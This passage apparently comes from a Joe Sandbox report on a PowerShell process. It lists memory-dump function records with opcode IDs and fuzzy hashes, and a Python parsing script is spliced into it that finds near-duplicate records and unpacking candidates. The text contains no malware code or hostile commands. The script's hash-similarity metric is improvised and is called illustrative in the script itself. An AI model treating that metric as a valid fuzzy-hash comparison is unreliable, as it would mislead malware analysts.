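• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-4083868402
• Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
• Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Similarity
• API ID:
• String ID: \Vvk$\Vvk
• API String ID: 0-1912818553
• Opcode ID: 549991ee21c6a7f68c536d8b7e611518edf36dace75b6ac42f506cb6e874a46b
• Instruction Fuzzy Hash: C9714070E002099FDF24DFA9D8407AEBBF2AF88714F14C12DD815A7294DB74A985CB91
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Similarity
• API ID:
• String ID: \Vvk$\Vvk
• API String ID: 0-1912818553
• Opcode ID: 82ce0c1c75efc5ae056bc09fbe3ad673780396baef4702cf0543bdb0144670d7
• Instruction Fuzzy Hash: 44714E70E002099FDF24DFA9D84579DBBF2AF88714F14C129D815A7290DBB4A985CF91
"""

API_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(.*), xrefs: (.*)$")
FIELD_RE = re.compile(r"^([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")


def parse_listing(text):
    """One dict per function record; a record ends at its Instruction Fuzzy Hash line.
    Lines without a bullet are section headings (APIs, Strings, Similarity, ...)."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = {"apis": [], "strings": [], "associated": []}
        if not line.startswith("•"):
            section = line
            continue
        body = line[1:].strip()
        if section == "APIs":
            if m := API_RE.match(body):
                cur["apis"].append({"name": m[1], "module": m[2], "args": m[3].split(","), "ref": m[4]})
        elif section == "Strings":
            if m := STRING_RE.match(body):
                cur["strings"].append({"value": m[1], "xrefs": m[2]})
        elif m := FIELD_RE.match(body):
            key, val = m[1].strip(), m[2].strip()
            if key == "Associated":
                # "Download File" is a link label the HTML export fused onto the dump name
                cur["associated"].append(val.removesuffix("Download File").strip())
            elif key == "Source File" and (s := SOURCE_RE.match(val)):
                cur.update(source=s[1], offset=int(s[2], 16), based_on_pe=(s[3] == "true"))
            else:
                cur[key] = val
                if key == "Instruction Fuzzy Hash":
                    records.append(cur)
                    cur, section = None, None
    return records


def fuzzy_agreement(h1, h2):
    """Fraction of positions where two hashes carry the same hex digit (ASSUMPTION: illustrative metric)."""
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1.upper(), h2.upper())) / len(h1)


def near_duplicates(records, threshold=0.8):
    """(opcode_id_a, opcode_id_b, agreement) for every pair at or above threshold."""
    pairs = []
    for a, b in combinations(records, 2):
        score = fuzzy_agreement(a.get("Instruction Fuzzy Hash", ""), b.get("Instruction Fuzzy Hash", ""))
        if score >= threshold:
            pairs.append((a["Opcode ID"], b["Opcode ID"], score))
    return pairs


def group_by_api_string_id(records):
    # Same API String ID means the same API-call and string profile in the Similarity section.
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API String ID", "")].append(r["Opcode ID"])
    return dict(groups)


def unbacked_code_regions(records):
    """Dumps not based on a PE image (ASSUMPTION: not mapped from a module on disk), i.e. unpacking candidates."""
    return sorted({r["source"] for r in records if r.get("based_on_pe") is False})
```

To use it on a full report, replace LISTING with the text of the function listing; near_duplicates() then returns the pairs worth diffing in a disassembler, and unbacked_code_regions() lists the dumps whose code has no on-disk module to attribute it to, which is where to look first for the unpacked payload.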
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h]vk$Ivk
                                                              • API String ID: 0-3194200174
                                                              • Opcode ID: 3ec9ab4ad60e6af6c1cbf1a5dd4cec3a78baa3e34ad96e8fe4ba5dd15cb074aa
                                                              • Instruction ID: 9bd6c3e6b28932d3e856c610800f29f602cae7d320fdf143713fb4eb75f20a46
                                                              • Opcode Fuzzy Hash: 3ec9ab4ad60e6af6c1cbf1a5dd4cec3a78baa3e34ad96e8fe4ba5dd15cb074aa
                                                              • Instruction Fuzzy Hash: B6315030B012188FCB25DB64C9946EEB7B2AF89345F1084E9D409AB351DB35EE86DF81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk
                                                              • API String ID: 0-1806392228
                                                              • Opcode ID: 488f1d1dc882e0b1cc84a30a9d910ba2cafe73509a7c9c4fea6e3fbdd10eeb72
                                                              • Instruction ID: be867c822a4ad9fb6ffd6fd613533c822fc11dbdf40313c04e838c8f6194f607
                                                              • Opcode Fuzzy Hash: 488f1d1dc882e0b1cc84a30a9d910ba2cafe73509a7c9c4fea6e3fbdd10eeb72
                                                              • Instruction Fuzzy Hash: 34B17D70E40219CFDF14CFA9D88579DBBF2EF88714F14C929E815A7290EB35A941CB81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96338605cb7029f79e0bd70c6665a06abe0fd2f022bfa27a654b3d02eae5ec9b
                                                              • Instruction ID: fe52f2fb68541eb374c09ef0a44c3eb436797cc53ab13d3914ab385bd564a30a
                                                              • Opcode Fuzzy Hash: 96338605cb7029f79e0bd70c6665a06abe0fd2f022bfa27a654b3d02eae5ec9b
                                                              • Instruction Fuzzy Hash: 0FC2A4B4B00205DFE714DFA8C840BAABBB2FB89344F208559D9156F796CB72DD42CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daddc53f357fff58fe02820565168d3c140ef291b87343248917803dd3bb173d
                                                              • Instruction ID: c6f230cc6218ec7be0cfb63457826a4a56e1c9fe10ea9e8d2bc09a6c4538cd82
                                                              • Opcode Fuzzy Hash: daddc53f357fff58fe02820565168d3c140ef291b87343248917803dd3bb173d
                                                              • Instruction Fuzzy Hash: 24C260B4A003149FEB64DF64CC54BEAB7B2BB85304F1084A9D8196B794CB75ED82CF91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14490d908eb8ef8e621928cb3aa17443eecec4c03776561047fb600b2a821da9
                                                              • Instruction ID: f7cd52bbd7ff0fa1485c1b6c837d3cb860abfb81d29cd08920af981e490abf41
                                                              • Opcode Fuzzy Hash: 14490d908eb8ef8e621928cb3aa17443eecec4c03776561047fb600b2a821da9
                                                              • Instruction Fuzzy Hash: 5C827DB4A00215DFEB20DF54C950BAEB7B2BB89304F10C9A9D91A6B754CB71ED82CF51
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7450f042a3f31751ef49985935ae22bc08a03c86b83e00fe3d0916409490e59
                                                              • Instruction ID: db8b73e9062b6bb5164a0d070feaf04c579a754327a4643e35dde8eb7208aec9
                                                              • Opcode Fuzzy Hash: b7450f042a3f31751ef49985935ae22bc08a03c86b83e00fe3d0916409490e59
                                                              • Instruction Fuzzy Hash: F1828CB4A00214DFEB60DF54C950BAEB7B3BB89304F10C9A9D91A6B754CB71AD82CF51
                                                              Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0fe103ef54a6f87935d37661e27dd527421d7eafc32d5b982b579586813bdd0
• Instruction ID: 514182bfbe853d784ab29ada261a6b95f5cc7f405a7032f6c3f8fc0e47502fd9
• Opcode Fuzzy Hash: a0fe103ef54a6f87935d37661e27dd527421d7eafc32d5b982b579586813bdd0
• Instruction Fuzzy Hash: 828282B4A10204DFE724DF98C440B9ABBB2FB49348F218559D9156F796CBB2ED42CF81
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a840570c0308c3f8a9aaa4dc2577aa894f90d8830388e4ee0365905568cc41ca
• Instruction ID: 2b67fefaa3f4c7aea1a499ec0cedf1816c0597d1b144b14eb86d7e5d55b28d8f
• Opcode Fuzzy Hash: a840570c0308c3f8a9aaa4dc2577aa894f90d8830388e4ee0365905568cc41ca
• Instruction Fuzzy Hash: C1727CB4A00215DFEB20DF54C950BAEB7B2BF89304F10C9A9D91A6B754CB71AD82CF51
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13e5987ce12f89407a31695dc3f2aff1881c3c79622efb4205f490c81c829da2
• Instruction ID: 1ce2170d8531a1a4f3caf2dafdff9f2581f84452dd54ffa66e9cea675334670f
• Opcode Fuzzy Hash: 13e5987ce12f89407a31695dc3f2aff1881c3c79622efb4205f490c81c829da2
• Instruction Fuzzy Hash: 1C526DB4A00214DFEB60DF54C950BAEB7B3BB85304F20C9A9D91A6B754CB71AD828F51
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4c0e30b26254eeceff6b4373098657c39d9b602c898012771bdc3f0a21f1119
• Instruction ID: 6895f448e625f941e4b5713e9cb44984fb6dda0dc8f812060aadd63a11a1d402
• Opcode Fuzzy Hash: c4c0e30b26254eeceff6b4373098657c39d9b602c898012771bdc3f0a21f1119
• Instruction Fuzzy Hash: EA32B0B0B00209DFD714DB98C440BAEBBB2AF86715F55C469E9059F391DBB2DC42CB92
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74854491fc00a377201e7752196ad435d5a4ed7aa3639803b1120e864708ad7d
• Instruction ID: 3659f918972f91a2abb5ce12863703731a7aa207b88aa6ef1598f6f9b088ac72
• Opcode Fuzzy Hash: 74854491fc00a377201e7752196ad435d5a4ed7aa3639803b1120e864708ad7d
• Instruction Fuzzy Hash: 81427074B003149FEB64DF54C890BAAB7B2BB85304F10C4A9D81A6B755CB75ED828F51
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f2977eda3d4a4174a239a4cde94b5c45508d0039d0c7efb3ea694bcc5894e66
• Instruction ID: 29fdab7d6962cd3f64f7b533ba0b6c24581f572791e0e4158911b30306721b52
• Opcode Fuzzy Hash: 3f2977eda3d4a4174a239a4cde94b5c45508d0039d0c7efb3ea694bcc5894e66
• Instruction Fuzzy Hash: CF125BB1B14306DFDB159B6888007BABBA6AFC6251F1488BADD05CB351DB71DC42C7A3
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2017a175ee97b8935df5c6a62b79d8bde6614f695f42cf29fefcb4344bb6e29
• Instruction ID: 86082403d7c53ccd93f250d486da5a1e0195432ac66ccc36fc08d09ef48c0812
• Opcode Fuzzy Hash: b2017a175ee97b8935df5c6a62b79d8bde6614f695f42cf29fefcb4344bb6e29
• Instruction Fuzzy Hash: 4042F674A01218DFDB15CFA8D484A9DFBB2BF89314F25C159E805AB3A6C771ED81CB90
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bdcc2d68c7f898f2ddf44c8e6253b3b8e430828abfccd2ca3ce488488fe23781
• Instruction ID: 23255638a940dd2e837c7f5ffa2f4f3599452a883d4e41f6dfba0149ac4de36f
• Opcode Fuzzy Hash: bdcc2d68c7f898f2ddf44c8e6253b3b8e430828abfccd2ca3ce488488fe23781
• Instruction Fuzzy Hash: DC124FB0A00215DFEB70DF14C880BA9B7B2BB46344F1184EAD959AB750DBB1EE81CF51
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28d8d00b11cce9201223aab295128a32aaf53dbd98034ac53fa7a3d2e41581e9
• Instruction ID: 921c006c93b365f8ee9871dc6ae84fa5f75e80e7a95df23e32c0ebdb3f7d1021
• Opcode Fuzzy Hash: 28d8d00b11cce9201223aab295128a32aaf53dbd98034ac53fa7a3d2e41581e9
• Instruction Fuzzy Hash: 0C122EB4A00215DFEB74DF14C880BAAB7B2BB46344F1184E9D919AB750DBB1EE81CF51
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 060f006ca08638cd4df9199e1c79cbf09a9fa6a333ff3be2a4f50805ec571936
• Instruction ID: 0d391ed9d06cd56bef0fded1b9d65199dab46c97fb04ffa767c56b053e96607c
• Opcode Fuzzy Hash: 060f006ca08638cd4df9199e1c79cbf09a9fa6a333ff3be2a4f50805ec571936
• Instruction Fuzzy Hash: 07A15F31A00208DFDB18DFA9D944A9DBBB3FF84314F158559E806AB395DB34BD4ACB90
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4dcf7f6a26a468f3373988d08c69c03a0c8f542f4c848803486d22441410de25
• Instruction ID: 625cff3ce1b1a97f031de4477d0b293fd1c2a0f53756174d40a82809482e6991
• Opcode Fuzzy Hash: 4dcf7f6a26a468f3373988d08c69c03a0c8f542f4c848803486d22441410de25
• Instruction Fuzzy Hash: 42B15E70E00209CFDB20CFA9D88579DBBF2AF88754F14852DD815E7294EBB4A985CB81
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7707daf29b299e9dfde0abd6f23a020740021cc092cc8179c79a2895cb18e556
• Instruction ID: 9748720bc159a221cc51bc3cc1efdda34aa23c08cd22650147cdc695e7a9a31e
• Opcode Fuzzy Hash: 7707daf29b299e9dfde0abd6f23a020740021cc092cc8179c79a2895cb18e556
• Instruction Fuzzy Hash: 6E918E74A006098FDB15CF58C4D8AAEFBB2FF89310B248599D815AB3A5C736FD51CB90
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcfe9a3b02b6906ac6350419252f5a17b58f81a3682ac628f34df8d2c02c31d9
• Instruction ID: 92466667ea07a3b0c68535ffede13e283837d166934ecf75c8b9f914159b188c
• Opcode Fuzzy Hash: dcfe9a3b02b6906ac6350419252f5a17b58f81a3682ac628f34df8d2c02c31d9
• Instruction Fuzzy Hash: 30517FF170530A9FD7209B698800766BBE5AFC6252F64896ADD09DB392DBB1C841C391
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1ef6d006e07d01a92d8d703f6a86e109cc7d45cf52af7f64bf37c62ef9f116b5
• Instruction ID: f210beabf1b173f725df2e27b17178eb05196ea867dac303aadeb0d4def5467e
• Opcode Fuzzy Hash: 1ef6d006e07d01a92d8d703f6a86e109cc7d45cf52af7f64bf37c62ef9f116b5
• Instruction Fuzzy Hash: F3713B70E01209DFDB18DFA5D884AADBBF2BF88304F148429D412AB790DB35BD46CB55
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da20703c980514af7e89113076d8fb1df0e473f044158d9997cf664d8e111f3f
• Instruction ID: 68dbefa8d959f9ef17dd03b7a74f5ce0f5e1afaea91c8a5600c2d7dc1ebe50b7
• Opcode Fuzzy Hash: da20703c980514af7e89113076d8fb1df0e473f044158d9997cf664d8e111f3f
• Instruction Fuzzy Hash: 8A5126F1704306DFDB256B7488106BA7BA2EFC2355F24886ADD02DB295DE71C841C7A2
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3647c669ca68b8bfd2e590f82aaf46ec0adc13cbabd919dd24203ef5160ee514
• Instruction ID: 71d119dc12cc3b9b594f7245d19ca7358ef56973536b61062b8674615a9d293a
• Opcode Fuzzy Hash: 3647c669ca68b8bfd2e590f82aaf46ec0adc13cbabd919dd24203ef5160ee514
• Instruction Fuzzy Hash: C0518DB17043469FDB215B788800BBBBBA2EFC2351F14887BD945CB391DAB1E851C7A1
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0232c281598380e8fa5b2c69e600ea0e95fb32a11ad366b60a98f6c4b5e0e63c
• Instruction ID: 2ac1fa6c94abce0e5f9645a252aff24b334d8637c6febfaafefb05fc61810e87
• Opcode Fuzzy Hash: 0232c281598380e8fa5b2c69e600ea0e95fb32a11ad366b60a98f6c4b5e0e63c
• Instruction Fuzzy Hash: 3B618D30A01609CFDB18DF68C884A9EBBB2FF89314F15C569D4069B791DB75BD46CB80
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 10050f094fcae1e6eb0c0181bcbdb043a9d115c26a25df9885ce68ba7f09997f
• Instruction ID: ab17e72332094ed21b74ec8ff6a4c7031b9adcedd29cb5645392eb8af9b19f7f
• Opcode Fuzzy Hash: 10050f094fcae1e6eb0c0181bcbdb043a9d115c26a25df9885ce68ba7f09997f
• Instruction Fuzzy Hash: A1412AF1B10201DFDB149F6489406767BB2EF86294F1988BADC01DF751D772E982CBA2
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc7b44437992f98f97a2d51835cac4cc89b8b6b220b6bde2dee89ffc7cf91e68
• Instruction ID: ce14a47080379ed02121a5da065856bd7c642d822662b2e1030123c627f36dc4
• Opcode Fuzzy Hash: cc7b44437992f98f97a2d51835cac4cc89b8b6b220b6bde2dee89ffc7cf91e68
• Instruction Fuzzy Hash: E4415F31B052059FDB19DF74C5586AA7BB3EF89750F098069E406EB7A0DB34AD42CB90
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9be0411475dcbd2ea18b66ed4b7a6a307ffd5cd16ae835a90a2975bf7c6cffe
• Instruction ID: 863b2248461309978264c3cc837c81a20174aa34f4b01da46a98e74dc11aaf7e
• Opcode Fuzzy Hash: b9be0411475dcbd2ea18b66ed4b7a6a307ffd5cd16ae835a90a2975bf7c6cffe
• Instruction Fuzzy Hash: 6E3113B17003068BDB14AB798C403FEB7A6AFC6355F20882ADC4ADB741EB72D941C791
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ba41d4ffd41be670af4b38dd1fc80ab68480abbea3e1b6d87a8431d631b52f2
• Instruction ID: c41ab2d496b7018efe17a178b0b0ad2c4d3dd45391be432be0d4704c955394b6
• Opcode Fuzzy Hash: 7ba41d4ffd41be670af4b38dd1fc80ab68480abbea3e1b6d87a8431d631b52f2
• Instruction Fuzzy Hash: E3413E31B012058FDB18DF74C558AA97BB7EF88710F188468E406AB3A0DB34AD41CB94
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a38c65f79cf68ce20d77aea953dc64c80a432cd3a5e61659778d1d6c65d3a6d5
• Instruction ID: 603998d8456d80693297f821560011573b61a79e335aff173adff797088420f6
• Opcode Fuzzy Hash: a38c65f79cf68ce20d77aea953dc64c80a432cd3a5e61659778d1d6c65d3a6d5
• Instruction Fuzzy Hash: 02417974A006058FDB05CF58C4D8AAAFBB2FF49310B118699D815AB3A5C336FD51CFA0
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a1c07997b88c2e6faa390a8ed851d79caed4f547e22226d6389e979d1df37bd
• Instruction ID: 008063218cfd2a9ea77f6331d3e129ade51a6bced40eb578d335d55b95135888
• Opcode Fuzzy Hash: 6a1c07997b88c2e6faa390a8ed851d79caed4f547e22226d6389e979d1df37bd
• Instruction Fuzzy Hash: E431F370B002049BE700ABA4C850FAFB7A3EFC6714F208424E9156F791CFB2DD428B92
Memory Dump Source
• Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00ea733d81317cbb540c45b8c4a82496edb697705768fe42134ac39cfb41def9
• Instruction ID: 2d0ccd32fa8e2b1639ce09faa4824c65f384d7f4ada830b81644927261fac88a
• Opcode Fuzzy Hash: 00ea733d81317cbb540c45b8c4a82496edb697705768fe42134ac39cfb41def9
• Instruction Fuzzy Hash: 62317074A093859FD702DF68C9A099ABFB0BF4B210B0941D6D485DB363C624ED45CBA2
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b892db6da1f348ddf5f624d0eec9051dec0dac6bccaa3ca69046d56e83b0d693
• Instruction ID: c6969cb19948e198cb073b2cc3d215cd28f8c062015bd92851a7be1ef1f1a003
• Opcode Fuzzy Hash: b892db6da1f348ddf5f624d0eec9051dec0dac6bccaa3ca69046d56e83b0d693
• Instruction Fuzzy Hash: D1214CB531030EDBEB24A7A98800B7767969BC2753F648C6AD805DB381DDB5C841C361
Memory Dump Source
• Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 88415744472905aa52878ff1cbfdbac7690e7291032225049c0b2cc24a3ff86b
• Instruction ID: e4da01f53e00f860f40c6a4566527443c6fd190dff7489ed4de7905f0d13c51d
• Opcode Fuzzy Hash: 88415744472905aa52878ff1cbfdbac7690e7291032225049c0b2cc24a3ff86b
• Instruction Fuzzy Hash: C6217EB530030ADBEB2467A64850737B796ABC5752F74C829E90ADB3C4DDB5C84193A0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f6fb7297e73bde1283863f76203ee587b4832282731af0fde58bfc03627c860
                                                              • Instruction ID: 296beb3968f1a54b3f2855ea767cd6aa0df785a8c6a0e89d18d6ba61b7afee02
                                                              • Opcode Fuzzy Hash: 6f6fb7297e73bde1283863f76203ee587b4832282731af0fde58bfc03627c860
                                                              • Instruction Fuzzy Hash: BB21CDF53083CAAFFB111B6248607727FA59F87241F788457E944DB2C2C9A98D459371
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d330df46f91185f2b8b61c06100c8c473fb0f5bd004991633d9b89743f398db8
                                                              • Instruction ID: 33f48347ad99842f13c4c0c4561c202a92ba17e074d0bd3d64da5df0dc8f9b53
